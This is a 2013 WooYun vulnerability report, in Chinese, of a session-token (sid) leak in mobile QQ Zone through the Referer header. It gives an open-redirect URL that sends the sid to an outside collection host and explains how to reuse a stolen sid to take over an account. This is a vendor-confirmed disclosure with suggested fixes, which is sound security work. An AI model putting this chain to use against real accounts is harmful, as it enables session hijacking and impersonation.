手机版QQ空间身份因素可被盗用(主动截获用户sid)

编号27590
Urlhttp://www.wooyun.org/bug.php?action=view&id=27590
漏洞状态厂商已经确认
漏洞标题手机版QQ空间身份因素可被盗用(主动截获用户sid)
漏洞类型设计缺陷/逻辑错误
厂商腾讯
白帽子呆子不开口
提交日期2013-07-03 18:19:00
公开日期2013-08-17 18:20:00
修复时间(not set)
确认时间2013-07-05 00:00:00
Confirm Spend2
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank5
漏洞简介
手机上的Web版或是手机qq内嵌的qq空间,都有sid被盗的可能
漏洞细节

z.qq.com或者手机qq内嵌入的qq空间,get参数sid可作为认证信息,所以说可能会被referer盗取
虽然说说中发的链接也做了中间页跳转处理,一般来说目标链接不会取到referer中的sid
但是m.url.cn或是www.urlshare.cn等中间页面对某些可信域名是不做检查而做直接跳转的
这样我们找一个可信域名下的url跳转漏洞就可以了,比如如下链接
http://b.wap.soso.com/qzone/detail.jsp?url=http%3A%2F%2Flvwei.me%2Fh%2fqs.php
发表在说说里,手机web版本上用户点击的话,sid会被盗取
手机qq里的qq空间,由于处理机制不一样,被显示成url.cn短链形式的都不可以取到sid。但如果使用评论并转载功能发表的攻击链接,则不会被转换成短链。ios,wp,android都一样
盗来的sid,使用http://z.qq.com/?sid=盗来的sid 这种链接就可以以目标用户身份进入他的qq空间,还可以和他的好友qq聊天

POC

看这个qq277634777的说说第一条例子
在z.qq.com中点短链,或者是手机qq中的qq空间(不包括手机qq的app)中点长链接。都在referer中发送sid了

1.jpg


2.jpg


3.jpg

修复方案

可信域别有跳转漏洞
可信域的跳转最好也要用中间页跳
get参数机制做身份验证还是有风险

状态信息 2013-07-03: 细节已通知厂商并且等待厂商处理中
2013-07-05: 厂商已经确认,细节仅向厂商公开
2013-07-15: 细节向核心白帽子及相关领域专家公开
2013-07-25: 细节向普通白帽子公开
2013-08-04: 细节向实习白帽子公开
2013-08-17: 细节向公众公开
厂商回复感谢反馈,我们正在跟进处理中。
回应信息危害等级:低漏洞Rank:5 确认时间:2013-07-05 14:05
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

内网?

小震02013-07-05 23:00:00